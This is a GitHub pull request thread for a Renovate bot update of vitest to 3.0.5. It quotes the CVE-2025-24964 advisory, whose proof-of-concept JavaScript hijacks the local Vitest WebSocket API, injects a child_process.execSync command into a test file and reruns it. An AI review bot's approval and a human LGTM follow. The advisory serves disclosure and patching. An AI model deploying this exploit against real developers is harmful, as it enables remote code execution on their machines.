chore(deps): update dependency vitest to v3.0.5 [security]

[renovate]

This PR contains the following updates:

Package	Type	Update	Change	OpenSSF
vitest (source)	devDependencies	patch	3.0.4 -> 3.0.5

GitHub Vulnerability Alerts

CVE-2025-24964

Summary

Arbitrary remote Code Execution when accessing a malicious website while Vitest API server is listening by Cross-site WebSocket hijacking (CSWSH) attacks.

Details

When api option is enabled (Vitest UI enables it), Vitest starts a WebSocket server. This WebSocket server did not check Origin header and did not have any authorization mechanism and was vulnerable to CSWSH attacks.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46

This WebSocket server has saveTestFile API that can edit a test file and rerun API that can rerun the tests. An attacker can execute arbitrary code by injecting a code in a test file by the saveTestFile API and then running that file by calling the rerun API.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76

PoC

1. Open Vitest UI.
2. Access a malicious web site with the script below.
3. If you have calc executable in PATH env var (you'll likely have it if you are running on Windows), that application will be executed.

// code from https://github.com/WebReflection/flatted
const Flatted=function(n){"use strict";function t(n){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n&&"function"==typeof Symbol&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":typeof n},t(n)}var r=JSON.parse,e=JSON.stringify,o=Object.keys,u=String,f="string",i={},c="object",a=function(n,t){return t},l=function(n){return n instanceof u?u(n):n},s=function(n,r){return t(r)===f?new u(r):r},y=function n(r,e,f,a){for(var l=[],s=o(f),y=s.length,p=0;p<y;p++){var v=s[p],S=f[v];if(S instanceof u){var b=r[S];t(b)!==c||e.has(b)?f[v]=a.call(f,v,b):(e.add(b),f[v]=i,l.push({k:v,a:[r,e,b,a]}))}else f[v]!==i&&(f[v]=a.call(f,v,S))}for(var m=l.length,g=0;g<m;g++){var h=l[g],O=h.k,d=h.a;f[O]=a.call(f,O,n.apply(null,d))}return f},p=function(n,t,r){var e=u(t.push(r)-1);return n.set(r,e),e},v=function(n,e){var o=r(n,s).map(l),u=o[0],f=e||a,i=t(u)===c&&u?y(o,new Set,u,f):u;return f.call({"":i},"",i)},S=function(n,r,o){for(var u=r&&t(r)===c?function(n,t){return""===n||-1<r.indexOf(n)?t:void 0}:r||a,i=new Map,l=[],s=[],y=+p(i,l,u.call({"":n},"",n)),v=!y;y<l.length;)v=!0,s[y]=e(l[y++],S,o);return"["+s.join(",")+"]";function S(n,r){if(v)return v=!v,r;var e=u.call(this,n,r);switch(t(e)){case c:if(null===e)return e;case f:return i.get(e)||p(i,l,e)}return e}};return n.fromJSON=function(n){return v(e(n))},n.parse=v,n.stringify=S,n.toJSON=function(n){return r(S(n))},n}({});

// actual code to run
const ws = new WebSocket('ws://localhost:51204/__vitest_api__')
ws.addEventListener('message', e => {
    console.log(e.data)
})
ws.addEventListener('open', () => {
    ws.send(Flatted.stringify({ t: 'q', i: crypto.randomUUID(), m: "getFiles", a: [] }))

    const testFilePath = "/path/to/test-file/basic.test.ts" // use a test file returned from the response of "getFiles"

    // edit file content to inject command execution
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "saveTestFile",
      a: [testFilePath, "import child_process from 'child_process';child_process.execSync('calc')"]
    }))
    // rerun the tests to run the injected command execution code
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "rerun",
      a: [testFilePath]
    }))
})

Impact

This vulnerability can result in remote code execution for users that are using Vitest serve API.

---

Release Notes

vitest-dev/vitest (vitest)

v3.0.5

Compare Source

🚀 Features

• ui: Insert message "no tests found" in ui - by @​DevJoaoLopes in https://github.com/vitest-dev/vitest/issues/7366 (92da4)

🐞 Bug Fixes

• Validate websocket request - by @​hi-ogawa and @​AriPerkkio in https://github.com/vitest-dev/vitest/issues/7317 (191ef)
• Don't toggle cli cursor on non-TTY - by @​AriPerkkio in https://github.com/vitest-dev/vitest/issues/7336 (3c805)
• vite-node: Differentiate file url with hash and query - by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/7365 (926ca)

View changes on GitHub

---

Configuration

📅 Schedule: Branch creation - "" in timezone Europe/Berlin, Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

Summary by CodeRabbit

• Chores
  • Upgraded our internal testing framework to the latest iteration for improved development robustness.

[coderabbitai]

Walkthrough

A single update has been made to the configuration of the refarch-webcomponent package. The version of the vitest dependency in the devDependencies section of the package.json file has been updated from 3.0.4 to 3.0.5 without any other modifications.

Changes

File	Change Summary
refarch-webcomponent/package.json	Updated vitest dependency version from 3.0.4 to 3.0.5

Possibly related PRs

• chore(deps): update dependency vite to v6 #738: The changes in the main PR, which update the vitest dependency version, are directly related to the retrieved PR, as both involve modifications to the vitest dependency in their respective package.json files.
• chore(deps): update dependency vitest to v3.0.5 [security] #764: The changes in the main PR and the retrieved PR both involve updating the vitest dependency from version 3.0.4 to 3.0.5 in their respective package.json files, indicating a direct relationship at the code level.
• chore(deps): update dependency vitest to v3.0.4 #753: The changes in the main PR update the vitest dependency from 3.0.4 to 3.0.5, while the retrieved PR updates it from 3.0.3 to 3.0.4, indicating a direct relationship in the versioning of the same dependency.

Suggested reviewers

• devtobi

Poem

I'm a bouncing bunny, coding with delight,
Hopping through updates, day and night.
Vitest shines bright at version three-point-oh-five,
In my burrow of code, everything comes alive.
With every line I tweak and revise,
I celebrate changes with joyful eyes!

---

📜 Recent review details

Configuration used: .coderabbit.yaml
Review profile: ASSERTIVE
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between cbf0c08 and 07471e1.

⛔ Files ignored due to path filters (1)

• refarch-webcomponent/package-lock.json is excluded by !**/package-lock.json

📒 Files selected for processing (1)

• refarch-webcomponent/package.json (1 hunks)

⏰ Context from checks skipped due to timeout of 90000ms (1)

• GitHub Check: build (refarch-backend)

🔇 Additional comments (1)

refarch-webcomponent/package.json (1)

39-39:

❓ Verification inconclusive

Security update: Approve the vitest version update.

This update addresses CVE-2025-24964, a critical vulnerability that could allow arbitrary code execution through Cross-site WebSocket hijacking (CSWSH) attacks when the Vitest API server is active.

Let's verify if the project uses the Vitest API server:

Additionally, please check the web for any additional security advisories:

---

🏁 Script executed:

#!/bin/bash
# Search for Vitest API server configuration or usage
rg -l "vitest.*api.*server|vitest.*server.*api" .

Length of output: 51

---

🌐 Web query:

Are there any other security vulnerabilities in Vitest version 3.0.5?

💡 Result:

Vitest version 3.0.5 was specifically released to address the critical CVE-2025-24964 remote code execution vulnerability[1][4][6][8]. Based on the available search results:

1. No other security vulnerabilities are explicitly mentioned for version 3.0.5 in the provided sources
2. Known issues in v3.x (non-security related):
   • Snapshot failures reported after upgrading to 3.0.5 (#7430)[7]
   • Configuration issues with ${configDir} references in TSConfig (#7420)[9]
   • Mocking failures when tests start with vi.mock() (#7470)[3]

Aspect	Details
Security Status	Contains only CVE-2025-24964 fix[6][8]
Recent Updates	Introduced browser testing improvements and workspace configuration changes[5]
Recommended Action	Maintain v3.0.x updates as new patches become available

The sources indicate that while v3.0.5 resolves the critical RCE vulnerability, users should monitor Vitest's GitHub repository for newly reported issues and apply subsequent patches promptly[7][9]. The development team has been actively reducing open issues (from 770 to 400) while improving test infrastructure[2][5].

Citations:

• 1: https://securityonline.info/vitest-vulnerability-exposes-developers-to-remote-code-execution-cve-2025-24964-cvss-9-7/
• 2: https://vite.dev/blog/announcing-vite3
• 3: Test file starting with vi.mock() fails to mock the module vitest-dev/vitest#7470
• 4: https://ogma.in/understanding-and-mitigating-cve-2025-24964-analyzing-the-vitest-remote-code-execution-vulnerability
• 5: https://vitest.dev/blog/vitest-3
• 6: GHSA-9crc-q9x8-hgqq
• 7: Snapshots failing since 3.0.5 vitest-dev/vitest#7430
• 8: https://thesecmaster.com/blog/how-to-fix-cve-2025-24964-critical-remote-code-execution-vulnerability-in-vitest
• 9: Vitest does not work with ${configDir} and references of tsconfig.json vitest-dev/vitest#7420
• 10: https://advisories.gitlab.com/pkg/npm/vitest/CVE-2025-24964/

---

Security update approval — Manual Verification Recommended

The vitest dependency update to version 3.0.5 successfully addresses CVE-2025-24964, mitigating the critical remote code execution vulnerability. A preliminary repository search (using rg -l "vitest.*api.*server|vitest.*server.*api" .) did not reveal any direct usage of the Vitest API server. However, due to the low signal from the automated search, please manually verify that no configuration or indirect references to the API server exist (e.g., within vitest configuration files such as vitest.config.js or vitest.config.ts).

• File: refarch-webcomponent/package.json (line 39)
• Change: "vitest": "3.0.5"

Additionally, web queries confirm that no new security vulnerabilities have been reported for version 3.0.5 aside from the addressed CVE-2025-24964.

Please perform a manual review of any Vitest configuration or usage patterns to ensure the API server is not inadvertently enabled.

---

🪧 Tips

Chat

There are 3 ways to chat with CodeRabbit:

• Review comments: Directly reply to a review comment made by CodeRabbit. Example:
  • I pushed a fix in commit <commit_id>, please review it.
  • Generate unit testing code for this file.
  • Open a follow-up GitHub issue for this discussion.
• Files and specific lines of code (under the "Files changed" tab): Tag @coderabbitai in a new review comment at the desired location with your query. Examples:
  • @coderabbitai generate unit testing code for this file.
  • @coderabbitai modularize this function.
• PR comments: Tag @coderabbitai in a new PR comment to ask questions about the PR branch. For the best results, please provide a very specific query, as very limited context is provided in this mode. Examples:
  • @coderabbitai gather interesting stats about this repository and render them as a table. Additionally, render a pie chart showing the language distribution in the codebase.
  • @coderabbitai read src/utils.ts and generate unit testing code.
  • @coderabbitai read the files in the src/scheduler package and generate a class diagram using mermaid and a README in the markdown format.
  • @coderabbitai help me debug CodeRabbit configuration file.

Note: Be mindful of the bot's finite context window. It's strongly recommended to break down tasks such as reading entire modules into smaller chunks. For a focused discussion, use review comments to chat about specific files and their changes, instead of using the PR comments.

CodeRabbit Commands (Invoked using PR comments)

• @coderabbitai pause to pause the reviews on a PR.
• @coderabbitai resume to resume the paused reviews.
• @coderabbitai review to trigger an incremental review. This is useful when automatic reviews are disabled for the repository.
• @coderabbitai full review to do a full review from scratch and review all the files again.
• @coderabbitai summary to regenerate the summary of the PR.
• @coderabbitai generate docstrings to generate docstrings for this PR. (Beta)
• @coderabbitai resolve resolve all the CodeRabbit review comments.
• @coderabbitai configuration to show the current CodeRabbit configuration for the repository.
• @coderabbitai help to get help.

Other keywords and placeholders

• Add @coderabbitai ignore anywhere in the PR description to prevent this PR from being reviewed.
• Add @coderabbitai summary to generate the high-level summary at a specific location in the PR description.
• Add @coderabbitai anywhere in the PR title to generate the title automatically.

Documentation and Community

• Visit our Documentation for detailed information on how to use CodeRabbit.
• Join our Discord Community to get help, request features, and share feedback.
• Follow us on X/Twitter for updates and announcements.

[devtobi]

LGTM